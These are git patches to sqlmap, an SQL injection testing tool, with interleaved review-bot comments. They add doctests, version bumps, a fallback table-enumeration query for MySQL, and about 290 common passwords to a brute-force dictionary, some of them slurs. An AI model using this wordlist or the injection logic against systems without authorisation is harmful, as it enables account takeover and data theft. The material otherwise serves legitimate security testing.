4c25a20efc458d8d1063ec0e5e8c8271dc515cbb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 7 Sep 2018 11:23:47 +0200 Subject: [PATCH 269/428] Docstring update and smalldict update (merge with top1575) --- lib/core/common.py | 56 ++++++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- txt/smalldict.txt | 291 +++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 348 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 5edc4f3ee3c..55379f7b203 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -165,6 +165,7 @@ from lib.core.settings import URLENCODE_CHAR_LIMIT from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import USER_AGENT_ALIASES +from lib.core.settings import VERSION from lib.core.settings import VERSION_STRING from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData @@ -1165,6 +1166,9 @@ def getHeader(headers, key): def checkFile(filename, raiseOnError=True): """ Checks for file existence and readability + + >>> checkFile(__file__) + True """ valid = True @@ -1647,6 +1651,9 @@ def parseUnionPage(page): def parseFilePaths(page): """ Detects (possible) absolute system paths inside the provided page content + + >>> _ = "/var/www/html/index.php"; parseFilePaths("Error occurred at line 207 of: %s
    Please contact your administrator" % _); _ in kb.absFilePaths + True """ if page: @@ -2039,6 +2046,9 @@ def parseXmlFile(xmlFile, handler): def getSQLSnippet(dbms, sfile, **variables): """ Returns content of SQL snippet located inside 'procs/' directory + + >>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate") + True """ if sfile.endswith('.sql') and os.path.exists(sfile): @@ -2078,9 +2088,12 @@ def getSQLSnippet(dbms, sfile, **variables): return retVal -def readCachedFileContent(filename, mode='rb'): +def readCachedFileContent(filename, mode="rb"): """ Cached reading of file content (avoiding multiple same file reading) + + >>> "readCachedFileContent" in readCachedFileContent(__file__) + True """ if filename not in kb.cache.content: @@ -2137,6 +2150,9 @@ def average(values): def calculateDeltaSeconds(start): """ Returns elapsed time from start till now + + >>> calculateDeltaSeconds(0) > 1151721660 + True """ return time.time() - start @@ -2144,6 +2160,9 @@ def calculateDeltaSeconds(start): def initCommonOutputs(): """ Initializes dictionary containing common output values used by "good samaritan" feature + + >>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"] + True """ kb.commonOutputs = {} @@ -3351,6 +3370,9 @@ def unhandledExceptionMessage(): def getLatestRevision(): """ Retrieves latest revision from the offical repository + + >>> getLatestRevision() == VERSION + True """ retVal = None @@ -4149,6 +4171,9 @@ def checkSystemEncoding(): def evaluateCode(code, variables=None): """ Executes given python code given in a string form + + >>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"] + 1 """ try: @@ -4202,6 +4227,9 @@ def incrementCounter(technique): def getCounter(technique): """ Returns query counter for a given technique + + >>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED) + 1 """ return kb.counters.get(technique, 0) 
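Review bot: The `>>> getLatestRevision() == VERSION` doctest performs a network fetch of the official repository and only holds when the local checkout is exactly the newest published revision, so it fails offline and on any older or locally bumped checkout (such as the version bumps elsewhere in this series); the function's own `retVal = None` default suggests it can also return None. A doctest that cannot run hermetically should be dropped, or replaced by a shape check that tolerates both outcomes, e.g. `>>> getLatestRevision() is None or re.search(r"^\d+\.\d+\.\d+(\.\d+)?$", getLatestRevision()) is not None` with expected output `True` (the module already uses `re`). The function body continues outside the hunk.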
@@ -4441,6 +4469,9 @@ def zeroDepthSearch(expression, value): """ Searches occurrences of value inside expression at 0-depth level regarding the parentheses + + >>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:] + 'FROM DUAL' """ retVal = [] @@ -4476,7 +4507,7 @@ def pollProcess(process, suppress_errors=False): Checks for process status (prints . if still running) """ - while True: + while process: dataToStdout(".") time.sleep(1) @@ -4701,12 +4732,33 @@ def getSafeExString(ex, encoding=None): return getUnicode(retVal or "", encoding=encoding).strip() def safeVariableNaming(value): + """ + Returns escaped safe-representation of a given variable name that can be used in Python evaluated code + + >>> safeVariableNaming("foo bar") + 'foo__SAFE__20bar' + """ + return re.sub(r"[^\w]", lambda match: "%s%02x" % (SAFE_VARIABLE_MARKER, ord(match.group(0))), value) def unsafeVariableNaming(value): + """ + Returns unescaped safe-representation of a given variable name + + >>> unsafeVariableNaming("foo__SAFE__20bar") + 'foo bar' + """ + return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value) def firstNotNone(*args): + """ + Returns first not-None value from a given list of arguments + + >>> firstNotNone(None, None, 1, 2, 3) + 1 + """ + retVal = None for _ in args: diff --git a/lib/core/settings.py b/lib/core/settings.py index 84e2fcf4941..60cea71072c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.10" +VERSION = "1.2.9.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
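Review bot: `while process:` turns a None argument into a silent no-op — pollProcess now returns without printing or polling anything instead of failing on the first attribute access inside the loop — and nothing in the hunk documents that change. If callers may legitimately pass None, state it in the docstring, e.g. `Checks for process status (prints . if still running); does nothing when process is None`; otherwise an explicit guard that logs the missing process would be clearer than relying on the loop condition. The loop body continues outside the hunk.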
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b91a5d368b5..1a646f26a7e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -30,7 +30,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -6e73b39f7c51f75ae64a652dec69ab2f lib/core/common.py +a69c59bec0b35442139d1c29f1b05797 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -021d606c9405fd23d630108bf5c39853 lib/core/settings.py +e595397f965c89ed29d9b4b89aada743 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py diff --git a/txt/smalldict.txt b/txt/smalldict.txt index 075a14e2cbd..7e153f7be06 100644 --- a/txt/smalldict.txt +++ b/txt/smalldict.txt @@ -18,6 +18,7 @@ 01011980 01012011 010203 +0123456789 06071992 098765 0987654321 @@ -69,6 +70,7 @@ 12345678 123456789 1234567890 +12345678910 123456789a 123456789q 123456a @@ -86,6 +88,7 @@ 123asdf 123go 123qwe +124578 12axzas21a 12qwaszx 1313 @@ -96,6 +99,7 @@ 13579 1412 141414 +142536 1430 147147 147258 @@ -145,6 +149,7 @@ 1994 1996 1a2b3c +1a2b3c4d 1chris 1kitty 1p2o3i @@ -172,6 +177,7 @@ 2252 232323 242424 +246810 252525 256879 2kids @@ -179,6 +185,7 @@ 3112 3141 315475 +321321 333 3333 33333 @@ -198,6 +205,7 @@ 444444 4444444 44444444 +456123 456789 4788 4815162342 @@ -228,6 +236,7 @@ 6969 696969 69696969 +741852 741852963 753951 7654321 
@@ -261,9 +270,11 @@ 999999 9999999 99999999 +999999999 a a12345 a123456 +a1234567 a1b2c3 a1b2c3d4 aa @@ -280,6 +291,7 @@ abby abc abc123 ABC123 +abc12345 abcd abcd123 abcd1234 @@ -288,6 +300,7 @@ abcdef Abcdef abcdefg Abcdefg +abcdefgh abgrtyu abigail abm @@ -330,11 +343,14 @@ agustin ahl ahm airborne +airforce airoplane +airplane airwolf ak akf7d98s2 aki123 +alabama alaska albert alberto @@ -345,6 +361,7 @@ alex1 alexande alexander alexandr +alexandra alexis Alexis alfaro @@ -373,18 +390,22 @@ altamira althea altima altima1 +always alyssa +amadeus amanda amanda1 amateur amazing amber +amelia amelie america american amigos amour ams +amsterdam amv amy anaconda @@ -394,18 +415,23 @@ andre andre1 andrea andrea1 +andreas +andres andrew andrew! Andrew andrew1 andrey andromed +andromeda andy angel angel1 angela angelica +angelina angelito +angelo angels angie angie1 @@ -432,6 +458,7 @@ apollo apollo13 apple apple1 +apple123 apple2 applepie apples @@ -495,6 +522,7 @@ asp aspateso19 aspen ass +assassin asshole assman assmunch @@ -502,12 +530,17 @@ ast asterix ath athena +atlanta +atlantis attila audiouser +audrey august august07 aurelie +aurora austin +australia autumn avalon avatar @@ -540,6 +573,7 @@ bambam bambi bamboo banana +bananas bandit bar baraka @@ -567,6 +601,7 @@ batman batman1 baxter bball +bbbbbb bc4j beach beaches @@ -593,6 +628,7 @@ becca beebop beer belgium +believe belize bella belle @@ -604,8 +640,10 @@ benji benny benoit benson +bentley beowulf berenice +berlin bernard bernardo bernie @@ -619,6 +657,7 @@ betito betsy betty bharat +bianca bic bichilora bichon @@ -658,6 +697,7 @@ birthday bis biscuit bishop +bismillah Bismillah bisounours bitch @@ -668,6 +708,7 @@ bitter biv bix biz +blabla black blackjack blah @@ -675,6 +716,7 @@ blahblah blanche blazer blessed +blessing blewis blinds blink182 @@ -693,6 +735,7 @@ bluebird blueeyes bluefish bluejean +bluemoon blues bluesky bmw @@ -734,6 +777,7 @@ boston Boston boulder bourbon +bowling boxer boxers bozo 
@@ -744,9 +788,11 @@ brandi brandon brandon1 brandy +brasil braves brazil brenda +brendan brent brewster brian @@ -757,6 +803,7 @@ brio_admin britain brittany Broadway +broken broker bronco broncos @@ -764,7 +811,10 @@ bronte brooke brooklyn brother +brothers +brownie bruce +brucelee brujita bruno brutus @@ -801,6 +851,7 @@ buster butch butler butter +buttercup butterfly butthead button @@ -833,6 +884,7 @@ canada cancer candy canela +cannabis cannon cannondale canon @@ -857,18 +909,22 @@ caroline carolyn carrie carrot +carson carter cartman cascade casey +casino Casio casper +cassandra cassie castle cat catalina catalog catch22 +catdog catfish catherine cathy @@ -885,7 +941,9 @@ cdemoucb cdouglas ce cecile +cecilia cedic +celeste celica celine celtic @@ -922,6 +980,7 @@ charlie Charlie charlie1 charlotte +charmed chat cheese cheese1 @@ -935,12 +994,15 @@ chester chester1 chevelle chevy +cheyenne chiara chicago +chichi chicken chicken1 chico chiefs +children china chinacat chinook @@ -963,6 +1025,8 @@ christ1 christia christian christin +christina +christine christmas christoph christopher @@ -976,6 +1040,7 @@ cinder cindy cindy1 cinema +cinnamon circuit cirque cirrus @@ -995,9 +1060,13 @@ claude claudel claudia clave +clayton cleo +cleopatra clerk cliff +clifford +clinton clipper clock cloclo @@ -1011,6 +1080,7 @@ cobra cocacola cock coco +coconut codename codeword cody @@ -1019,6 +1089,7 @@ coke colette colleen college +collins color colorado colors @@ -1066,9 +1137,11 @@ corvette corwin cosmo cosmos +cotton cougar Cougar cougars +counter country courier courtney @@ -1082,10 +1155,12 @@ craig crawford crazy cream +creation creative Creative crescent cricket +crimson cristian cristina cross @@ -1146,6 +1221,7 @@ daisy dakota dale dallas +damien dammit damogran dan @@ -1156,6 +1232,7 @@ danger daniel Daniel daniel1 +daniela danielle danny dantheman @@ -1165,6 +1242,7 @@ Darkman darkness darkside darkstar +darling darren darryl darwin 
@@ -1180,6 +1258,7 @@ dawn daytek dbsnmp dbvision +dddddd dead deadhead dean @@ -1192,6 +1271,7 @@ deedee deeznuts def default +defender delano delete deliver @@ -1214,6 +1294,8 @@ des des2k desert design +designer +desire deskjet desktop destiny @@ -1227,6 +1309,7 @@ dexter dharma diablo diamond +diamonds diana diane dianne @@ -1239,6 +1322,8 @@ digital dilbert dillweed dim +dingdong +dinosaur dip dipper director @@ -1246,6 +1331,7 @@ dirk dirty disco discoverer_admin +discovery disney dixie dixon @@ -1286,6 +1372,7 @@ doudou doug dougie douglas +download downtown dpfpass draft @@ -1299,6 +1386,7 @@ dreams dreamweaver driver drowssap +drpepper drummer dsgateway dssys @@ -1345,6 +1433,7 @@ einstein ejb ejsadmin ejsadmin_password +elaine electric element elephant @@ -1365,6 +1454,7 @@ e-mail emerald emily eminem +emmanuel emmitt emp empire @@ -1372,7 +1462,9 @@ enamorada energy eng engage +engineer england +english eni enigma enjoy @@ -1384,13 +1476,16 @@ eric1 erin ernie1 erotic +escape escort escort1 estefania estelle +esther Esther estore estrella +eternity etoile eugene europe @@ -1428,9 +1523,13 @@ farmer farout farside fatboy +fatcat +father +fatima faust fdsa fearless +february feedback felicidad felipe @@ -1446,14 +1545,17 @@ ferris fiction fidel Figaro +fighter fii files finance +finger finprod fiona fire fireball firebird +firefly fireman firenze first @@ -1477,6 +1579,7 @@ flight flip flipper flm +florence florida florida1 flower @@ -1502,6 +1605,7 @@ ford forest forever forever1 +forget Fortune forum forward @@ -1530,6 +1634,7 @@ frederic free freebird freedom +freedom1 freeman freepass freeuser @@ -1554,6 +1659,7 @@ frogs front242 Front242 frontier +frosty fte ftp fubar @@ -1597,6 +1703,7 @@ games gammaphi gandalf Gandalf +gangster garcia garden garfield @@ -1605,6 +1712,7 @@ gargoyle garlic garnet garou324 +garrett garth gary gasman @@ -1626,6 +1734,7 @@ gerald german germany germany1 +geronimo Geronimo getout gfhjkm 
@@ -1641,6 +1750,7 @@ gilgamesh gilles ginger Gingers +giovanni girl girls giselle @@ -1651,6 +1761,7 @@ gl glenn glider1 global +gloria gma gmd gme @@ -1666,6 +1777,8 @@ goaway goblin goblue gocougs +goddess +godfather godisgood godiva godslove @@ -1674,9 +1787,11 @@ goethe gofish goforit gold +goldberg golden Golden goldfish +goldie golf golfer gollum @@ -1691,10 +1806,12 @@ google goose gopher gordon +gorilla gpfd gpld gr grace +gracie graham gramps grandma @@ -1718,10 +1835,12 @@ greta gretchen Gretel gretzky +griffin grizzly groovy grover grumpy +guardian guess guest guido @@ -1748,12 +1867,16 @@ hamilton hamlet hammer Hammer +hamster +handsome hank hanna hannah +hannibal hannover23 hansolo hanson +happiness happy happy1 happy123 @@ -1764,6 +1887,7 @@ harley Harley HARLEY harley1 +harmony haro harold harriet @@ -1794,6 +1918,7 @@ helen helena helene hell +hellfire hello Hello hello1 @@ -1810,6 +1935,7 @@ henry Henry hentai herbert +hercules herman hermes hermosa @@ -1833,8 +1959,10 @@ hockey hockey1 hola holiday +holland hollister1 holly +hollywood home home123 homebrew @@ -1858,6 +1986,7 @@ horse horses hosehead hotdog +hotmail hotrod hottie house @@ -1909,6 +2038,7 @@ igi igs iguana igw +ihateyou ihavenopass ikebanaa iknowyoucanreadthis @@ -1926,13 +2056,16 @@ imageuser imagine imc imedia +immortal impact impala +imperial imt indian indiana indigo indonesia +inferno infinity info informix @@ -1965,6 +2098,7 @@ irmeli ironman isaac isabel +isabella isabelle isc island @@ -1998,6 +2132,7 @@ jan jane Janet janice +january japan jared jasmin @@ -2027,14 +2162,17 @@ jenny1 jensen jer jer2911 +jeremiah jeremy jericho +jerome jerry Jersey jesse jesse1 jessica Jessica +jessica1 jessie jester jesus @@ -2052,6 +2190,7 @@ jimbo jimbob jimi jimmy +jjjjjj jkl123 jkm jl @@ -2059,6 +2198,7 @@ jmuser joanie joanna Joanna +joanne joe joel joelle @@ -2108,10 +2248,12 @@ julie julie1 julien juliet +julius jumanji jumbo jump junebug +jungle junior juniper jupiter 
@@ -2121,12 +2263,16 @@ justice justice4 justin justin1 +justine juventus +kaiser kakaxaqwe kakka kalamazo kali +kamikaze kangaroo +karate karen karen1 karin @@ -2142,6 +2288,7 @@ kathy katie Katie katie1 +katrina kawasaki kayla kcin @@ -2165,6 +2312,7 @@ ketchup kevin kevin1 kevinn +keyboard khan kidder kids @@ -2176,7 +2324,9 @@ kimberly king kingdom kingfish +kingkong kings +kingston kirill kirk kissa2 @@ -2198,6 +2348,7 @@ koko kombat kramer kris +krishna kristen kristi kristin @@ -2206,6 +2357,7 @@ kristine kwalker l2ldemo lab1 +labrador labtec lacrosse laddie @@ -2217,6 +2369,8 @@ lalala lambda lamer lance +lancelot +lancer larry larry1 laser @@ -2248,6 +2402,8 @@ lemon leo leon leonard +leonardo +leopard leslie lestat lester @@ -2265,6 +2421,7 @@ library life lifehack light +lightning lights lima lincoln @@ -2298,6 +2455,7 @@ loki lol123 lola lolita +lollipop london lonely lonestar @@ -2305,6 +2463,7 @@ longer longhorn looney loren +lorenzo lori lorna lorraine @@ -2316,6 +2475,7 @@ lotus lou louis louise +loulou love love123 lovelove @@ -2327,6 +2487,7 @@ loverboy lovers loveyou loveyou1 +loving lucas lucia lucifer @@ -2346,15 +2507,18 @@ macross macse30 maddie maddog +madeline Madeline madison madman madmax madoka madonna +madrid maggie magic magic1 +magnolia magnum maiden mail @@ -2371,6 +2535,7 @@ mallorca manag3r manageme manager +manchester manolito manprod manson @@ -2388,6 +2553,9 @@ maria maria1 mariah mariah1 +marian +mariana +marianne marie marie1 marielle @@ -2398,10 +2566,12 @@ mariner marines marino mario +marion mariposa mark mark1 market +markus marlboro marley mars @@ -2411,6 +2581,8 @@ martha martin martin1 martina +martinez +martini marty marvin mary @@ -2418,6 +2590,7 @@ maryjane master Master master1 +masters math matrix matt @@ -2465,6 +2638,7 @@ mercedes mercer mercury merde +meredith merlin merlot Merlot @@ -2484,6 +2658,7 @@ miamor michael Michael michael1 +michaela michal michel Michel 
@@ -2503,6 +2678,7 @@ midori midvale midway migrate +miguel miguelangel mikael mike @@ -2543,6 +2719,7 @@ mnbvcxz mobile mobydick modem +mohammed moikka mojo mokito @@ -2559,6 +2736,7 @@ money1 money159 mongola monica +monika monique monisima monitor @@ -2579,6 +2757,7 @@ mookie moomoo moon moonbeam +moonlight moore moose mopar @@ -2589,10 +2768,12 @@ morgan moroni morpheus morris +morrison mort mortimer mot_de_passe mother +motherfucker motor motorola mountain @@ -2620,16 +2801,20 @@ munchkin murphy murray muscle +mushroom music mustang mustang1 mwa mxagent +mylove mypass mypassword mypc123 myriam +myself myspace1 +mystery nadia nadine naked @@ -2642,6 +2827,7 @@ napoleon naruto nascar nat +natalia nataliag natalie natasha @@ -2667,6 +2853,7 @@ nellie nelson nemesis neotix_sys +neptune nermal nesbit nesbitt @@ -2676,6 +2863,7 @@ network neutrino new newaccount +newcastle newcourt newlife newpass @@ -2695,11 +2883,13 @@ Nicholas nichole nick nicklaus +nicolas nicole nicole1 nigel nigger nigger1 +nightmare nightshadow nightwind nike @@ -2754,6 +2944,7 @@ oas_public oatmeal oaxaca obiwan +oblivion obsession ocean ocitest @@ -2775,6 +2966,7 @@ okb okc oke oki +oklahoma oko okr oks @@ -2798,6 +2990,7 @@ open openspirit openup opera +operator opi opus oracache @@ -2825,10 +3018,12 @@ ordplugins ordsys oregon oreo +original orion orlando orville oscar +osiris osm osp22 ota @@ -2836,8 +3031,10 @@ otalab otter ou812 OU812 +outlaw outln overkill +overlord owa owa_public owf_mgr @@ -2848,6 +3045,7 @@ ozp ozs ozzy pa +pa55word paagal pacers pacific @@ -2865,6 +3063,7 @@ pamela Pamela pana panama +panasonic pancake panda panda1 @@ -2874,6 +3073,7 @@ pantera panther panthers panties +panzer papa paper papito @@ -2894,9 +3094,11 @@ pass pass1 pass12 pass123 +pass1234 passion passport passw0rd +Passw0rd passwd passwo1 passwo2 
@@ -2908,13 +3110,16 @@ password. Password PASSWORD password1 +Password1 password12 password123 password2 password3 +passwort pastor pat patches +patience patoclero patricia patrick @@ -2937,10 +3142,12 @@ peanuts Peanuts pearl pearljam +pebbles pedro pedro1 peekaboo peewee +pegasus peggy pekka pelirroja @@ -2966,6 +3173,7 @@ perlita perros perry person +personal perstat petalo pete @@ -2981,9 +3189,11 @@ phialpha phil philip philips +phillip phillips phish phishy +phoebe phoenix Phoenix phoenix1 @@ -3006,6 +3216,8 @@ pigeon piglet Piglet pimpin +pineapple +pingpong pink pinkfloyd piolin @@ -3026,6 +3238,7 @@ play playboy player players +playstation please plex plus @@ -3039,6 +3252,7 @@ po8 poa poetic poetry +poison poiuyt pokemon polar @@ -3083,11 +3297,16 @@ portal_demo portal_sso_ps porter portland +portugal pos +potato +potter power powercartuser +powers ppp PPP +pppppp praise prayer precious @@ -3105,8 +3324,10 @@ princess Princess princess1 print +printer printing private +prodigy prof prometheus property @@ -3133,6 +3354,7 @@ Purple pussies pussy pussy1 +pussycat pv pw123 pyramid @@ -3235,6 +3457,7 @@ razz re reality realmadrid +reaper rebecca Rebecca red @@ -3242,6 +3465,7 @@ red123 redcloud reddog redfish +redhead redman redrum redskins @@ -3252,6 +3476,7 @@ redwood reed reggae reggie +regina rejoice reliant remember @@ -3306,24 +3531,29 @@ roberto roberts robin robinhood +robinson robocop robotech robotics roche rock +rocker rocket rocket1 rockie rocknroll rockon +rockstar rocky rocky1 rodeo +rodney roger roger1 rogers roland rolex +roller rolltide roman romantico @@ -3332,6 +3562,7 @@ ronald ronaldo roni ronica +ronnie rookie rooster root123 @@ -3340,6 +3571,7 @@ rootroot rosario rose rosebud +rosemary roses rosie rosita @@ -3385,6 +3617,7 @@ sally salmon salou25 salut +salvador salvation sam samantha @@ -3401,6 +3634,7 @@ samson samsung samuel samuel22 +samurai sandi sandman sandra 
@@ -3425,6 +3659,7 @@ saturn Saturn saturn5 savage +savannah sbdc scarecrow scarface @@ -3471,6 +3706,7 @@ september septiembre serega serena +serenity sergei sergey sergio @@ -3492,6 +3728,7 @@ Shadow shadow1 shaggy shalom +shamrock shanghai shannon shanny @@ -3513,6 +3750,7 @@ shelley shelly shelter shelves +sherlock sherry ship shirley @@ -3520,11 +3758,13 @@ shit shithead shoes shogun +shopping shorty shorty1 shotgun Sidekick sidney +siemens sierra Sierra sigmachi @@ -3532,9 +3772,11 @@ signal signature si_informtn_schema silver +silvia simba simba1 simon +simone simple simpson simpsons @@ -3542,10 +3784,13 @@ simsim sinatra sinegra singer +single sirius +sister sister12 siteminder skate +skater skeeter Skeeter skibum @@ -3555,6 +3800,7 @@ skip skipper skipper1 skippy +skittles skull skunk skydive @@ -3607,10 +3853,13 @@ sober1 soccer soccer1 soccer2 +socrates softball +software soledad soleil solomon +something sonic sonics sonny @@ -3624,13 +3873,16 @@ soyhermosa space spain spanky +sparkle sparks sparky Sparky sparrow spartan spazz +speaker special +spectrum speedo speedy Speedy @@ -3658,6 +3910,7 @@ spurs sql sqlexec squash +squirrel squirt srinivas ssp @@ -3666,10 +3919,14 @@ ssssss stacey stalker stan +standard stanley star star69 starbuck +starcraft +stardust +starfish stargate starlight stars @@ -3682,6 +3939,7 @@ stealth steel steele steelers +stefan stella steph steph1 @@ -3689,6 +3947,7 @@ stephani stephanie stephen stephi +sterling Sterling steve steve1 @@ -3706,6 +3965,7 @@ stinky stivers stocks stone +stones storage storm stormy @@ -3714,7 +3974,9 @@ strat strato strat_passwd strawberry +street stretch +strike strong stuart stud @@ -3731,6 +3993,7 @@ suckme sudoku sue sugar +sullivan sultan summer Summer @@ -3776,6 +4039,7 @@ svetlana swanson sweden sweet +sweetheart sweetie sweetpea sweety @@ -3789,6 +4053,7 @@ swordfish swpro swuser sydney +sylvester sylvia sylvie symbol 
@@ -3845,6 +4110,7 @@ teflon tekila telecom telefono +telephone temp temp! temp123 @@ -3858,6 +4124,7 @@ tequiero tequila teresa terminal +terminator terry terry1 test @@ -3874,6 +4141,7 @@ testpilot testtest test_user texas +thailand thankyou the theatre @@ -3884,6 +4152,7 @@ thejudge theking thelorax theman +theodore theresa Theresa therock @@ -3934,8 +4203,10 @@ toby today tokyo tom +tomato tomcat tommy +tomtom tony tool tootsie @@ -3970,6 +4241,8 @@ trevor tricia tricky trident +trigger +trinidad trinity trish tristan @@ -3977,11 +4250,13 @@ triton trixie trojan trombone +trooper trophy trouble trout truck trucker +truelove truman trumpet trustno1 @@ -3996,10 +4271,13 @@ turbine turbo turbo2 turkey +turner turtle tweety tweety1 +twilight twins +twister twitter tybnoq tyler @@ -4008,12 +4286,15 @@ ultimate um_admin um_client undead +undertaker underworld unicorn unicornio unique united unity +universal +universe universidad unix unknown @@ -4038,6 +4319,7 @@ vacation vader vagina val +valencia valentin valentina valentinchoque @@ -4088,12 +4370,14 @@ viper viper1 virago virgil +virgin virginia virus viruser visa vision visual +vivian vladimir volcano volley @@ -4107,6 +4391,7 @@ waiting walden waldo walker +wallace walleye wally walter @@ -4117,6 +4402,7 @@ warner warren warrior warriors +washington water water1 Waterloo @@ -4134,9 +4420,11 @@ Webster wedge weezer welcome +welcome1 welcome123 wendy wendy1 +werewolf wesley west western @@ -4153,6 +4441,7 @@ whitney whocares whoville wibble +wicked wiesenhof wilbur wildcat @@ -4208,12 +4497,14 @@ Woodrow woody woofwoof word +wordpass work123 world World worship wps wrangler +wrestling wright writer writing From ec253dd5bdd0a799d5976efb923ca785d3bab7f6 Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar Date: Fri, 7 Sep 2018 11:53:43 +0200 Subject: [PATCH 270/428] Support for table name retrieval from mysql.innodb_table_stats (fallback if primary fails) --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 32 ++++++++++++++++++-------------- txt/checksum.md5 | 6 +++--- xml/queries.xml | 4 ++-- 4 files changed, 24 insertions(+), 20 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 60cea71072c..18cb2f44fa3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.11" +VERSION = "1.2.9.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index c399ed13744..a8edb98b829 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py 
@@ -261,24 +261,28 @@ def getTables(self, bruteForce=None): rootQuery = queries[Backend.getIdentifiedDbms()].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None + values = [] - if condition: - if not Backend.isDbms(DBMS.SQLITE): - query += " WHERE %s" % condition + for query, condition in ((rootQuery.inband.query, getattr(rootQuery.inband, "condition", None)), (getattr(rootQuery.inband, "query2", None), getattr(rootQuery.inband, "condition2", None))): + if not isNoneValue(values) or not query: + break - if conf.excludeSysDbs: - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg) - query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) - else: - query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) + if condition: + if not Backend.isDbms(DBMS.SQLITE): + query += " WHERE %s" % condition - if len(dbs) < 2 and ("%s," % condition) in query: - query = query.replace("%s," % condition, "", 1) + if conf.excludeSysDbs: + infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(infoMsg) + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) + else: + query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) - values = inject.getValue(query, blind=False, time=False) + if len(dbs) < 2 and ("%s," % condition) in query: + query = query.replace("%s," % condition, "", 1) + + if query: + values = 
inject.getValue(query, blind=False, time=False) if not isNoneValue(values): values = filter(None, arrayizeValue(values)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1a646f26a7e..c91220820d4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e595397f965c89ed29d9b4b89aada743 lib/core/settings.py +39a71984ff7fd683d06c489f33d477a7 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -207,7 +207,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py 